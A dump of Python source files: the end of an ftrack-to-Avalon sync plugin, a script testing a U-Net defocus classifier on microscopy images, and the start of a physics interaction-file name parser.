            continue
        ftrack_mongo_mapping_found[ftrack_id] = avalon_entity["_id"]
    self._update_avalon_tasks(
        ftrack_mongo_mapping_found,
        tasks_per_ftrack_id
    )
def update_entities(self):
    """
    Flush accumulated entity changes to Avalon with one bulk write.

    Every entry of ``self.updates`` is converted into a mongo ``$set``
    document (project entities get project-specific conversion) and
    sent as a single ``bulk_write``. ``self.updates`` is reset after a
    successful flush; with nothing to write, the method is a no-op.
    """
    bulk_operations = []
    for entity_id, entity_changes in self.updates.items():
        stored_entity = self.avalon_ents_by_id[entity_id]
        set_document = avalon_sync.from_dict_to_set(
            entity_changes, stored_entity["type"] == "project"
        )
        bulk_operations.append(
            UpdateOne({"_id": entity_id}, set_document)
        )
    if not bulk_operations:
        return
    self.dbcon.bulk_write(bulk_operations)
    self.updates = collections.defaultdict(dict)
@property
def duplicated_report(self):
    """Build interface "label" items describing duplicated entity names.

    Queries ftrack for every entity sharing a duplicated name and lists
    their hierarchy paths, marking which ones are already synchronized
    to Avalon. Returns an empty list when nothing is duplicated.
    """
    if not self.duplicated:
        return []
    ft_project = self.cur_project
    # Collect unique names of duplicated entities (querying ftrack for
    # any entity not yet cached).
    duplicated_names = []
    for ftrack_id in self.duplicated:
        ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
        if not ftrack_ent:
            ftrack_ent = self.process_session.query(
                self.entities_query_by_id.format(
                    ft_project["id"], ftrack_id
                )
            ).one()
            self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
        name = ftrack_ent["name"]
        if name not in duplicated_names:
            duplicated_names.append(name)
    joined_names = ", ".join(
        ["\"{}\"".format(name) for name in duplicated_names]
    )
    # All entities in the project carrying one of the duplicated names.
    ft_ents = self.process_session.query(
        self.entities_name_query_by_name.format(
            ft_project["id"], joined_names
        )
    ).all()
    ft_ents_by_name = collections.defaultdict(list)
    for ft_ent in ft_ents:
        name = ft_ent["name"]
        ft_ents_by_name[name].append(ft_ent)
    if not ft_ents_by_name:
        return []
    subtitle = "Duplicated entity names:"
    items = []
    items.append({
        "type": "label",
        "value": "# {}".format(subtitle)
    })
    items.append({
        "type": "label",
        "value": (
            "<p><i>NOTE: It is not allowed to use the same name"
            " for multiple entities in the same project</i></p>"
        )
    })
    for name, ents in ft_ents_by_name.items():
        items.append({
            "type": "label",
            "value": "## {}".format(name)
        })
        paths = []
        for ent in ents:
            ftrack_id = ent["id"]
            ent_path = "/".join([_ent["name"] for _ent in ent["link"]])
            # Mark entities that already exist in Avalon (possibly
            # under a different, previously synchronized name).
            avalon_ent = self.avalon_ents_by_id.get(ftrack_id)
            if avalon_ent:
                additional = " (synchronized)"
                if avalon_ent["name"] != name:
                    additional = " (synchronized as {})".format(
                        avalon_ent["name"]
                    )
                ent_path += additional
            paths.append(ent_path)
        items.append({
            "type": "label",
            "value": '<p>{}</p>'.format("<br>".join(paths))
        })
    return items
@property
def regex_report(self):
    """Build interface "label" items for names that failed name regex.

    Each failed entity is rendered as "name - path" with the offending
    name emphasized. Returns an empty list when nothing failed.
    """
    if not self.regex_failed:
        return []
    report_rows = [
        {
            "type": "label",
            "value": "# {}".format("Entity names contain prohibited symbols:")
        },
        {
            "type": "label",
            "value": (
                "<p><i>NOTE: You can use Letters( a-Z ),"
                " Numbers( 0-9 ) and Underscore( _ )</i></p>"
            )
        }
    ]
    project_entity = self.cur_project
    for failed_id in self.regex_failed:
        entity = self.ftrack_ents_by_id.get(failed_id)
        if not entity:
            # Not cached yet - fetch it from ftrack and remember it.
            entity = self.process_session.query(
                self.entities_query_by_id.format(
                    project_entity["id"], failed_id
                )
            ).one()
            self.ftrack_ents_by_id[failed_id] = entity
        entity_name = entity["name"]
        # Path without the entity itself, then the name highlighted.
        path_parts = [link["name"] for link in entity["link"][:-1]]
        path_parts.append("<strong>{}</strong>".format(entity_name))
        report_rows.append({
            "type": "label",
            "value": "<p>{} - {}</p>".format(
                entity_name, "/".join(path_parts)
            )
        })
    return report_rows
def report(self):
    """Show accumulated sync report (errors, warnings, info) to user.

    Aggregates ``self.report_items`` plus the duplicated/regex reports
    into interface label items and displays them. Returns None when
    there is nothing to report, True after showing the interface.
    """
    msg_len = len(self.duplicated) + len(self.regex_failed)
    for msgs in self.report_items.values():
        msg_len += len(msgs)
    if msg_len == 0:
        return
    items = []
    project_name = self.cur_project["full_name"]
    title = "Synchronization report ({}):".format(project_name)
    keys = ["error", "warning", "info"]
    for key in keys:
        subitems = []
        if key == "warning":
            subitems.extend(self.duplicated_report)
            subitems.extend(self.regex_report)
        for _msg, _items in self.report_items[key].items():
            if not _items:
                continue
            # Message format is "title||note1||note2..."
            msg_items = _msg.split("||")
            msg = msg_items[0]
            subitems.append({
                "type": "label",
                "value": "# {}".format(msg)
            })
            if len(msg_items) > 1:
                for note in msg_items[1:]:
                    subitems.append({
                        "type": "label",
                        "value": "<p><i>NOTE: {}</i></p>".format(note)
                    })
            if isinstance(_items, str):
                _items = [_items]
            subitems.append({
                "type": "label",
                "value": '<p>{}</p>'.format("<br>".join(_items))
            })
        # Visual splitter between non-empty sections.
        if items and subitems:
            items.append(self.report_splitter)
        items.extend(subitems)
    self.show_interface(
        items=items,
        title=title,
        event=self._cur_event
    )
    return True
def _update_avalon_tasks(
    self, ftrack_mongo_mapping_found, tasks_per_ftrack_id
):
    """
    Prepare new "tasks" content for existing records in Avalon.

    Args:
        ftrack_mongo_mapping_found (dictionary): ftrack parentId to
            Avalon _id mapping
        tasks_per_ftrack_id (dictionary): task dictionaries per ftrack
            parentId

    Returns:
        None
    """
    bulk_writes = [
        UpdateOne(
            {"_id": mongo_id},
            {"$set": {"data.tasks": tasks_per_ftrack_id[ftrack_id]}}
        )
        for ftrack_id, mongo_id in ftrack_mongo_mapping_found.items()
    ]
    if bulk_writes:
        self.dbcon.bulk_write(bulk_writes)
def _mongo_id_configuration(
    self,
    ent_info,
    cust_attrs,
    hier_attrs,
    temp_dict
):
    """Return configuration id of the custom attribute storing mongo id.

    Prefers the hierarchical attribute; falls back to the legacy
    per-entity-type attribute. Results are memoized in ``temp_dict``
    (under "_hierarchical" and under the entity type, respectively).
    Returns None when no matching configuration exists.
    """
    # Use hierarchical mongo id attribute if possible (resolved once).
    if "_hierarchical" not in temp_dict:
        temp_dict["_hierarchical"] = next(
            (
                attr["id"] for attr in hier_attrs
                if attr["key"] == CUST_ATTR_ID_KEY
            ),
            None
        )
    hier_conf_id = temp_dict["_hierarchical"]
    if hier_conf_id is not None:
        return hier_conf_id
    # Legacy part for cases that MongoID attribute is per entity type.
    entity_type = ent_info["entity_type"]
    cached_conf_id = temp_dict.get(entity_type)
    if cached_conf_id is not None:
        return cached_conf_id
    conf_id = None
    for attr in cust_attrs:
        if attr["key"] != CUST_ATTR_ID_KEY:
            continue
        if attr["entity_type"] != ent_info["entityType"]:
            continue
        # Task attributes must also match the object type.
        if (
            ent_info["entityType"] == "task"
            and attr["object_type_id"] != ent_info["objectTypeId"]
        ):
            continue
        conf_id = attr["id"]
        break
    temp_dict[entity_type] = conf_id
    return conf_id
def register(session, plugins_presets):
    '''Register plugin. Called when used as a plugin.'''
    SyncToAvalonEvent(session, plugins_presets).register()
| 37.347481
| 79
| 0.530052
|
77ffc0b91655fc773614ec3d6f7cd5d255460bca
| 15,071
|
py
|
Python
|
test_angle_file/test_single_example.py
|
Chenli235/AngleCorrection_Unet
|
49fb2eba653c20d6299902e73d6b1a8c42ad50ca
|
[
"Apache-2.0"
] | null | null | null |
test_angle_file/test_single_example.py
|
Chenli235/AngleCorrection_Unet
|
49fb2eba653c20d6299902e73d6b1a8c42ad50ca
|
[
"Apache-2.0"
] | null | null | null |
test_angle_file/test_single_example.py
|
Chenli235/AngleCorrection_Unet
|
49fb2eba653c20d6299902e73d6b1a8c42ad50ca
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 25 09:40:42 2021
@author: chen li
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from model import Unet_defocus
import skimage.io
import skimage.transform
import skimage.color
import skimage
import logging
import scipy.misc
import scipy.stats
import matplotlib.pyplot as plt
import scipy as sp
import scipy.ndimage
import heapq
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import cm
import scipy.io as io
from PIL import Image
from utils import *
import time
logging.getLogger().setLevel(logging.DEBUG)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
image_size = 512
def draw_trainloss():
    """Plot the training-loss curve recorded during GAN training.

    Reads one loss value (float) per line from the hard-coded
    ``train_losses.txt`` results file and plots the sequence with
    matplotlib. Blank lines are ignored. Returns None.
    """
    losses_path = 'results/GAN_20210728-204833/train_losses.txt'
    # "with" guarantees the handle is closed even if a line fails to
    # parse (the original manual open/close leaked it on exceptions),
    # and iterating the file replaces the readlines(10000) chunk loop.
    with open(losses_path) as loss_file:
        value = [float(line) for line in loss_file if line.strip()]
    plt.plot(np.array(value))
def cal_certainty(prob):
    """Return a certainty score in [0, 1] for a class-probability vector.

    Certainty is one minus the Shannon entropy of the normalized
    vector, divided by log(num_classes): a uniform distribution yields
    0, a one-hot distribution yields 1. A vector that does not sum to
    a positive value is treated as fully uncertain (returns 0).
    """
    total = np.sum(prob)
    if not total > 0:
        return 0
    normalized = prob / total
    class_count = prob.shape[0]
    normalized_entropy = (
        scipy.stats.entropy(normalized.flatten()) / np.log(class_count)
    )
    return 1.0 - normalized_entropy
def test_one_image_512():
    """Run the defocus U-Net on one hard-coded 512x512 image pair.

    Loads trained weights, stacks the two input tiffs into a 2-channel
    tensor (clipped to 10000 and scaled to [0, 1]), predicts per-pixel
    defocus classes and returns a (512, 512) map where background
    pixels carry the sentinel value 100.
    """
    model_path = 'results/GAN_20210728-204833/net_500.pt'
    classes_num = 13
    model = Unet_defocus(2,classes_num).to(device)
    model.load_state_dict(torch.load(model_path))
    # image size need to be 512
    img1_path = 'test_images/906_32_1.tiff'
    img2_path = 'test_images/906_32_2.tiff'
    image_1 = skimage.io.imread(img1_path)
    image_2 = skimage.io.imread(img2_path)
    # Clip intensities, then scale by the same constant below.
    image_1[image_1>10000] = 10000
    image_2[image_2>10000] = 10000
    img = np.dstack((image_1,image_2)).astype(np.float32)
    img = np.expand_dims(img,axis = 0)
    img = img/10000.0
    # HWC -> NCHW for the network.
    img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2).contiguous().to(device)
    with torch.no_grad():
        model.eval()
        output = model(img)
        #probs = F.softmax(output,dim=1)
        probs = F.softmax(output,dim=1).cpu().detach().numpy()
        #pred = torch.argmax(probs,dim=1).cpu().detach().numpy()
        # cert = np.zeros((512,512))
        # for i in range(output.shape[2]):
        #     for j in range(output.shape[3]):
        #         cert[i,j] = cal_certainty(prob[0,:,i,j])
        pred = output.argmax(dim=1,keepdim=True).cpu().detach().numpy()
    print(output.shape)
    prediction_img = np.zeros((512,512))
    # Smoothed source intensity used for the background threshold.
    source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
    for i in range(output.shape[2]):
        for j in range(output.shape[3]):
            # background value set to 100; low intensity or low
            # prediction certainty both count as background
            if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
                prediction_img[i,j] = 100 # meaning the pixel belongs to background
            else:
                #prob = probs[0,:,i,j]
                #max_index = heapq.nlargest(3, range(len(prob)), prob.take)
                #pred_defocus_level = sum(prob[max_index]/sum(prob[max_index])*max_index)
                prediction_img[i,j] = pred[0,0,i,j]
    return prediction_img
def pred_convert_img(pred_img):
    """Convert a per-pixel class-prediction map into an RGB image.

    Pixels holding the background sentinel 100 stay black; every other
    pixel is colored via ``get_class_rgb`` for its class value.
    Returns an (H, W, 3) float array.
    """
    rows, cols = pred_img.shape[0], pred_img.shape[1]
    img = np.zeros((rows, cols, 3))
    for row in range(rows):
        for col in range(cols):
            if pred_img[row, col] != 100:
                img[row, col, :] = get_class_rgb(pred_img[row, col])
    return img
def generate_colorbar():
    """Show a standalone rainbow colorbar for values in [0, 1].

    Builds a small figure containing only a horizontal, tick-less
    colorbar with the "rainbow" colormap, displays it, and returns the
    colorbar object.
    """
    fig, ax = plt.subplots(figsize=(1, 6))
    fig.subplots_adjust(bottom=0.5)
    cmap = mpl.cm.rainbow
    norm = mpl.colors.Normalize(vmin=0.0, vmax=1.0)
    # NOTE(review): ColorbarBase is deprecated in recent matplotlib;
    # fig.colorbar(mpl.cm.ScalarMappable(norm, cmap), ...) is the
    # modern equivalent - confirm target matplotlib version.
    cb1 = mpl.colorbar.ColorbarBase(ax, cmap=cmap,
                                    norm=norm,
                                    orientation='horizontal',ticks=[])
    #cb1.set_label('Some Units')
    fig.show()
    return cb1
def generate_defocus_color(predict_img):
    """Map normalized defocus predictions onto the 'rainbow' colormap.

    Background pixels (value 100) are left black.  NOTE(review): the
    output buffer is allocated as shape[1] x shape[1]; for non-square
    inputs this would be wrong -- preserved from the original, confirm
    inputs are always square.

    :param predict_img: 2-D array of values in [0, 1], or 100 for background
    :return: (W, W, 3) RGB array
    """
    rainbow = plt.get_cmap('rainbow')
    side = predict_img.shape[1]
    colored = np.zeros((side, side, 3))
    for row in range(predict_img.shape[0]):
        for col in range(predict_img.shape[1]):
            value = predict_img[row, col]
            if value == 100:
                continue
            rgba = rainbow(value)
            colored[row, col, :] = rgba[:3]
    return colored
def test_one_image_1024():
    """Predict a 1024x1024 defocus map by tiling the model over 512px crops.

    Loads a trained Unet checkpoint, runs it on the four 512x512 quadrants
    of a 1024x1024 crop of the input image pair, then masks pixels that are
    background (smoothed intensity <= 300) or low-certainty (< 0.3) with
    the sentinel value 100.

    :return: (1024, 1024) array of per-pixel class labels (100 = background)
    """
    model_path = 'results/GAN_20210728-204833/net_500.pt'
    classes_num = 13
    model = Unet_defocus(2, classes_num).to(device)
    model.load_state_dict(torch.load(model_path))
    img1_path = "test_images/961898_anglecorrection_GalvoX_0.14977_GalvoY_0.047227_GalvoRoll_-0.019153_detectionlens_-0.0043_1.tiff"
    img2_path = "test_images/961898_anglecorrection_GalvoX_0.14977_GalvoY_0.047227_GalvoRoll_-0.019153_detectionlens_-0.0043_2.tiff"
    start = time.time()
    image_1 = skimage.io.imread(img1_path)
    image_2 = skimage.io.imread(img2_path)
    # clip saturated pixels before [0, 1] normalization
    image_1[image_1 > 10000] = 10000
    image_2[image_2 > 10000] = 10000
    # 1024x1024 crop centered at (1324, 1324)
    image_1 = image_1[1324 - 512:1324 + 512, 1324 - 512:1324 + 512]
    image_2 = image_2[1324 - 512:1324 + 512, 1324 - 512:1324 + 512]
    img = np.dstack((image_1, image_2)).astype(np.float32)
    img = np.expand_dims(img, axis=0)
    img = img / 10000.0
    img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0, 3, 1, 2)
    output = torch.zeros(1, 13, 1024, 1024)
    # BUG FIX: was np.zeros((1, 1, 10242, 1024)) -- a typo that allocated a
    # ~10x oversized buffer; only the first 1024 rows were ever written/read.
    pred = np.zeros((1, 1, 1024, 1024))
    with torch.no_grad():
        model.eval()
        # run the model tile-by-tile (2x2 grid of 512px tiles)
        for i in range(1024 // 512):
            for j in range(1024 // 512):
                img_ = img[:, :, i*512:i*512+512, j*512:j*512+512].contiguous().to(device)
                output[:, :, i*512:i*512+512, j*512:j*512+512] = model(img_)
                pred[:, :, i*512:i*512+512, j*512:j*512+512] = output[:, :, i*512:i*512+512, j*512:j*512+512].argmax(dim=1, keepdim=True).cpu().detach().numpy()
    probs = F.softmax(output, dim=1).cpu().detach().numpy()
    prediction_img = np.zeros((1024, 1024))
    source_img = sp.ndimage.filters.gaussian_filter(image_1, [1, 1], mode='reflect')
    for i in range(output.shape[2]):
        for j in range(output.shape[3]):
            # background sentinel = 100
            if source_img[i, j] <= 300 or cal_certainty(probs[0, :, i, j]) < 0.3:
                prediction_img[i, j] = 100  # pixel belongs to background
            else:
                prediction_img[i, j] = pred[0, 0, i, j]
    end = time.time()
    print(end - start)
    return prediction_img
def cal_certainty_fast(probs):
    """Vectorized per-pixel certainty from class probabilities.

    Certainty is 1 - H(p)/log(13), where H is the Shannon entropy over the
    13 class channels (axis 1): a uniform distribution gives 0 certainty,
    a one-hot distribution gives 1.

    :param probs: array of shape (1, 13, H, W) of class probabilities
    :return: (H, W) array of certainties in [0, 1]
    """
    # re-normalize along the class axis so rows sum to 1 (defensive; a
    # softmax input already does)
    normalized = probs / np.sum(probs, axis=1)
    entropy = scipy.stats.entropy(normalized, axis=1)
    certainty = 1 - entropy / np.log(13)
    return certainty.squeeze()
def test_one_image_1024_fast():
    """Predict defocus labels for a 1024x1024 crop by running the model on
    its four 512x512 tiles, then vectorized masking of background
    (smoothed intensity <= 300) and low-certainty (<= 0.3) pixels with the
    sentinel value 100.  Fast replacement for the per-pixel loop kept
    commented below.

    :return: (1024, 1024) array of per-pixel class labels
    """
    model_path = 'results/GAN_20210728-204833/net_500.pt'
    classes_num = 13
    model = Unet_defocus(2,classes_num).to(device)
    model.load_state_dict(torch.load(model_path))
    img1_path = "test_images_new/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_1.tiff"
    img2_path = "test_images_new/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_2.tiff"
    start = time.time()
    image_1 = skimage.io.imread(img1_path)
    image_2 = skimage.io.imread(img2_path)
    # clip saturated pixels before [0, 1] normalization
    image_1[image_1>10000] = 10000
    image_2[image_2>10000] = 10000
    # 1024x1024 crop centered at (1024, 1024)
    image_1 = image_1[1024-512:1024+512,1024-512:1024+512]
    image_2 = image_2[1024-512:1024+512,1024-512:1024+512]
    #image_1 = image_1[:,::-1]
    #image_2 = image_2[:,::-1]
    img = np.dstack((image_1,image_2)).astype(np.float32)
    img = np.expand_dims(img,axis = 0)
    img = img/10000.0
    img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2)
    output = torch.zeros(1,13,1024,1024)
    pred = np.zeros((1,1,1024,1024))
    with torch.no_grad():
        model.eval()
        # run the model tile-by-tile (2x2 grid of 512px tiles)
        for i in range(1024//512):
            for j in range(1024//512):
                img_ = img[:,:,i*512:i*512+512,j*512:j*512+512].contiguous().to(device)
                output[:,:,i*512:i*512+512,j*512:j*512+512] = model(img_)
                pred[:,:,i*512:i*512+512,j*512:j*512+512] = output[:,:,i*512:i*512+512,j*512:j*512+512].argmax(dim=1,keepdim=True).cpu().detach().numpy()
    probs = F.softmax(output,dim=1).cpu().detach().numpy()
    prediction_img = np.zeros((1024,1024))
    prediction_img = pred[0,0,:,:]
    source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
    cert_img = cal_certainty_fast(probs)
    print(cert_img.squeeze().shape)
    print(source_img.shape)
    print(cert_img.shape)
    # sentinel 100 = background: dim source pixels or low-certainty pixels
    prediction_img[source_img<=300] = 100
    prediction_img[cert_img<=0.3] = 100
    # for i in range(output.shape[2]):
    #     for j in range(output.shape[3]):
    #         # background value set to 100
    #         if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
    #             prediction_img[i,j] = 100 # meaning the pixel belongs to background
    #         else:
    #             #prob = probs[0,:,i,j]
    #             prediction_img[i,j] = pred[0,0,i,j]
    end = time.time()
    print(end-start)
    return prediction_img
def test_one_image_512_fast():
    """Predict defocus labels for a single 512x512 crop in one model pass.

    Loads the trained checkpoint, runs one forward pass on a 512x512 crop
    of the input image pair, then masks background (smoothed intensity
    <= 300) and low-certainty (<= 0.3) pixels with the sentinel value 100.

    :return: (512, 512) array of per-pixel class labels (100 = background)
    """
    model_path = 'results/GAN_20210728-204833/net_500.pt'
    classes_num = 13
    model = Unet_defocus(2, classes_num).to(device)
    model.load_state_dict(torch.load(model_path))
    img1_path = "test_images/961898_original_GalvoX_0.18516_GalvoY_-0.053165_GalvoRoll_-0.034161_detectionlens_-0.0044_1.tiff"
    img2_path = "test_images/961898_original_GalvoX_0.18516_GalvoY_-0.053165_GalvoRoll_-0.034161_detectionlens_-0.0044_2.tiff"
    start = time.time()
    image_1 = skimage.io.imread(img1_path)
    image_2 = skimage.io.imread(img2_path)
    # clip saturated pixels before [0, 1] normalization
    image_1[image_1 > 10000] = 10000
    image_2[image_2 > 10000] = 10000
    # 512x512 crop centered at (1260, 1260)
    image_1 = image_1[1260 - 256:1260 + 256, 1260 - 256:1260 + 256]
    image_2 = image_2[1260 - 256:1260 + 256, 1260 - 256:1260 + 256]
    img = np.dstack((image_1, image_2)).astype(np.float32)
    img = np.expand_dims(img, axis=0)
    img = img / 10000.0
    img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0, 3, 1, 2)
    # FIX: removed the dead pre-allocations of `output`/`pred` with
    # 1024-sized shapes -- both were unconditionally overwritten below.
    with torch.no_grad():
        model.eval()
        img_ = img.contiguous().to(device)
        output = model(img_)
        pred = output.argmax(dim=1, keepdim=True).cpu().detach().numpy()
    probs = F.softmax(output, dim=1).cpu().detach().numpy()
    prediction_img = pred[0, 0, :, :]
    source_img = sp.ndimage.filters.gaussian_filter(image_1, [1, 1], mode='reflect')
    cert_img = cal_certainty_fast(probs)
    print(cert_img.squeeze().shape)
    print(source_img.shape)
    print(cert_img.shape)
    # sentinel 100 = background: dim source pixels or low-certainty pixels
    prediction_img[source_img <= 300] = 100
    prediction_img[cert_img <= 0.3] = 100
    end = time.time()
    print(end - start)
    return prediction_img
def test_one_image_2048():
    """Predict a full 2048x2048 defocus label map by tiling the model over
    a 4x4 grid of 512x512 tiles, then mask background (smoothed intensity
    <= 300) and low-certainty (< 0.3) pixels with the sentinel value 100.

    :return: (2048, 2048) array of per-pixel class labels
    """
    model_path = 'results/GAN_20210728-204833/net_500.pt'
    classes_num = 13
    model = Unet_defocus(2,classes_num).to(device)
    model.load_state_dict(torch.load(model_path))
    img1_path = "test_images/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_1.tiff"
    img2_path = "test_images/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_2.tiff"
    image_1 = skimage.io.imread(img1_path)
    image_2 = skimage.io.imread(img2_path)
    # clip saturated pixels before [0, 1] normalization
    image_1[image_1>10000] = 10000
    image_2[image_2>10000] = 10000
    img = np.dstack((image_1,image_2)).astype(np.float32)
    img = np.expand_dims(img,axis = 0)
    img = img/10000.0
    img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2)
    output = torch.zeros(1,13,2048,2048)
    pred = np.zeros((1,1,2048,2048))
    with torch.no_grad():
        model.eval()
        # run the model tile-by-tile (4x4 grid of 512px tiles)
        for i in range(2048//512):
            for j in range(2048//512):
                img_ = img[:,:,i*512:i*512+512,j*512:j*512+512].contiguous().to(device)
                output[:,:,i*512:i*512+512,j*512:j*512+512] = model(img_)
                pred[:,:,i*512:i*512+512,j*512:j*512+512] = output[:,:,i*512:i*512+512,j*512:j*512+512].argmax(dim=1,keepdim=True).cpu().detach().numpy()
    probs = F.softmax(output,dim=1).cpu().detach().numpy()
    prediction_img = np.zeros((2048,2048))
    source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
    # NOTE(review): this per-pixel loop is slow; see the vectorized masking
    # in test_one_image_1024_fast for the equivalent fast path.
    for i in range(output.shape[2]):
        for j in range(output.shape[3]):
            # background value set to 100
            if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
                prediction_img[i,j] = 100 # meaning the pixel belongs to background
            else:
                #prob = probs[0,:,i,j]
                prediction_img[i,j] = pred[0,0,i,j]
                #max_index = heapq.nlargest(3, range(len(prob)), prob.take)
                #pred_defocus_level = sum(prob[max_index]/sum(prob[max_index])*max_index)
                #prediction_img[i,j] = (pred_defocus_level)/12
    return prediction_img
if __name__ == "__main__":
    # Entry point: run the fast 1024x1024 inference and save the
    # class-colored defocus map.  (Older commented-out experiment
    # variants removed -- recoverable from version control.)
    pred_img = test_one_image_1024_fast()
    img_defocus = pred_convert_img(pred_img)
    plt.imsave('defocus_img.tiff', img_defocus)
| 41.065395
| 154
| 0.613562
|
e11a0f4aeeb952c2b8f7cc3c68152d9fe134557c
| 15,215
|
py
|
Python
|
src/deprecated/int/parser.py
|
dilynfullerton/tr-A_dependence_plots
|
4a03664f1cc9552787bd9cb39d1409b507f10777
|
[
"CC0-1.0"
] | 1
|
2016-07-20T08:47:27.000Z
|
2016-07-20T08:47:27.000Z
|
src/deprecated/int/parser.py
|
dilynfullerton/tr-A_dependence_plots
|
4a03664f1cc9552787bd9cb39d1409b507f10777
|
[
"CC0-1.0"
] | null | null | null |
src/deprecated/int/parser.py
|
dilynfullerton/tr-A_dependence_plots
|
4a03664f1cc9552787bd9cb39d1409b507f10777
|
[
"CC0-1.0"
] | null | null | null |
"""int/parser.py
Functions for parsing interaction files and extracting information from
their file names
"""
from __future__ import print_function
from parse import get_files_r, filename_elts_list, elt_from_felts
from parse import content_lines, comment_lines
from constants import FN_PARSE_INT_ELT_SPLIT as ELT_SPLIT
from constants import FN_PARSE_INT_RGX_BASE as REGEX_BASE
from constants import FN_PARSE_INT_RGX_E as REGEX_E
from constants import FN_PARSE_INT_RGX_HW as REGEX_HW
from constants import FN_PARSE_INT_RGX_MASS as REGEX_MASS
from constants import FN_PARSE_INT_RGX_NAME as REGEX_NAME
from constants import FN_PARSE_INT_RGX_RP as REGEX_RP
from constants import F_PARSE_INT_CMNT_INDEX as CMNT_INDEX
from constants import F_PARSE_INT_CMNT_ZBT as CMNT_ZBT
from constants import F_PARSE_INT_COL_START_ORBITAL as COL_START_ORBITAL
from constants import F_PARSE_INT_NCOLS_ORBITALS as NCOLS_ORBITALS
from constants import F_PARSE_INT_ROW_SPE as ROW_SPE
from constants import F_PARSE_INT_CMNT_STR as CMNT_STR
# ............................................................
# File name parsing
# ............................................................
def e_level_from_filename(filename, split_char=ELT_SPLIT,
                          e_regex=REGEX_E):
    """Extract the e_max truncation level from *filename*.

    Files follow the convention ..._e[e-level]_...; the element holding
    the e-level is the last one that begins with 'e'.

    :param filename: name of the file to parse
    :param split_char: character separating filename elements
    :param e_regex: regex that fully matches the e element
    :return: integer e-level, or None if absent
    """
    felts = filename_elts_list(filename, split_char)
    return _e_from_felts(felts, e_regex)
def _e_from_felts(felts, e_regex):
    # Strip the leading 'e' and parse the remainder as an int.
    match = elt_from_felts(felts, e_regex)
    if match is None:
        return None
    return int(match[1:])
def hw_from_filename(filename, split_char=ELT_SPLIT,
                     hw_regex=REGEX_HW):
    """Extract the hw frequency number from *filename*; None if absent.

    Files follow the convention ..._hw[number]_...; the last element
    that begins with 'hw' is the one used.

    :param filename: name of the file to parse
    :param split_char: character separating filename elements
    :param hw_regex: regex that fully matches the hw element
    :return: integer hw value, or None if absent
    """
    felts = filename_elts_list(filename, split_char)
    return _hw_from_felts(felts, hw_regex)
def _hw_from_felts(felts, hw_regex):
    # Drop the leading 'hw' prefix and parse the rest as an int.
    match = elt_from_felts(felts, hw_regex)
    if match is None:
        return None
    return int(match[2:])
def base_from_filename(filename, split_char=ELT_SPLIT,
                       base_regex=REGEX_BASE):
    """Extract the base A-number (normal-ordering reference) from *filename*.

    The first element (left to right) fully matched by *base_regex* is used.

    :param filename: name of the file to parse
    :param split_char: character separating filename elements
    :param base_regex: regex that fully matches the base element
    :return: integer base value, or None if absent
    """
    felts = filename_elts_list(filename, split_char)
    return _base_from_felts(felts, base_regex)
def _base_from_felts(felts, base_regex):
    # Strip the single-character prefix and parse the remainder as an int.
    match = elt_from_felts(felts, base_regex)
    if match is None:
        return None
    return int(match[1:])
def rp_from_filename(filename, split_char=ELT_SPLIT,
                     rp_regex=REGEX_RP):
    """Extract the Rp (proton radius?) label from *filename*.

    Elements are scanned right-to-left for the first full match of
    *rp_regex*.

    :param filename: name of the file to parse
    :param split_char: character separating filename elements
    :param rp_regex: regex that fully matches the rp element
    :return: integer Rp label, or None if absent
    """
    felts_reversed = reversed(filename_elts_list(filename, split_char))
    return _rp_from_felts(felts_reversed, rp_regex)
def _rp_from_felts(felts, rp_regex):
    # NOTE(review): only the single character after 'Rp' is parsed, so a
    # multi-digit Rp label would be truncated -- confirm labels are one digit.
    match = elt_from_felts(felts, rp_regex)
    if match is None:
        return None
    return int(match[match.find('Rp') + 2])
def mass_number_from_filename(filename, split_char=ELT_SPLIT,
                              mass_regex=REGEX_MASS):
    """Extract the mass number from *filename*.

    Files follow the convention *A[mass number][extension]; elements are
    scanned right-to-left for the first full match of *mass_regex*.

    :param filename: filename from which to get the mass number
    :param split_char: character separating filename elements
    :param mass_regex: regex that fully matches the mass element
    :return: integer mass number, or None if absent
    """
    felts = list(filename_elts_list(filename, split_char))
    felts.reverse()
    mass = elt_from_felts(felts, mass_regex)
    if mass is None:
        return None
    return int(mass[1:])
def name_from_filename(filename, split_char=ELT_SPLIT,
                       name_regex=REGEX_NAME):
    """Extract the method name (e.g. 'magnus') from *filename*.

    The first element (left to right) fully matched by *name_regex* is
    returned unchanged.

    :param filename: name of the data file
    :param split_char: character separating filename elements
    :param name_regex: regex the name must fully match
    :return: the matched name element, or None if absent
    """
    felts = filename_elts_list(filename, split_char)
    return elt_from_felts(felts, name_regex)
def exp(filename, split_char=ELT_SPLIT, e_regex=REGEX_E, hw_regex=REGEX_HW,
        b_regex=REGEX_BASE, rp_regex=REGEX_RP):
    """Build the 4-tuple exp identifier (see int/ExpInt.py) for *filename*.

    :param filename: name of the interaction file
    :param split_char: character that separates filename elements
    :param e_regex: regex matching the e_max element
    :param hw_regex: regex matching the hw element
    :param b_regex: regex matching the normal-ordering element
